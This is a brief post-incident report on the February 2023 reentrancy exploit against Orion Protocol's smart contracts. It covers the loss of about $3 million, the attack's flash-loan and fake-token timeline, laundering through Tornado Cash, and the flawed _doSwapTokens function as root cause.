Reentrancy Attack on Orion Protocol Leads to $3 Million Loss

Summary

On February 2, 2023, Orion Protocol, a decentralized blockchain platform that aggregates liquidity across both centralized and decentralized exchanges, fell victim to a sophisticated smart contract exploit. The attacker manipulated a reentrancy vulnerability within the protocol’s core smart contracts, which enabled them to divert approximately $3 million in tokens across the Ethereum and Binance Smart Chain networks.

Attackers

The identity of the attacker is unknown. Two addresses were primarily involved in the attack:

erc20:

bep20:

Fake Token addresses:

Losses

$3 million

Timeline

  • February 2, 2023: The attackers started by depositing 0.5 USDC into contracts and initiating a flash loan.
  • February 2, 2023: Using a false token and a series of swaps, the attackers executed the reentrancy exploit to manipulate the contract’s balance calculation, ultimately siphoning off approximately $3 million.
  • February 2, 2023: The attackers proceeded to launder their stolen assets through multiple transactions, including funneling approximately 1100 ETH into Tornado Cash.

source

Security Failure Causes

  • Reentrancy Vulnerability: The vulnerability was within the Orion Protocol’s smart contracts, particularly in the _doSwapTokens function. This reentrancy vulnerability led to a miscalculation of the user’s USDT balance.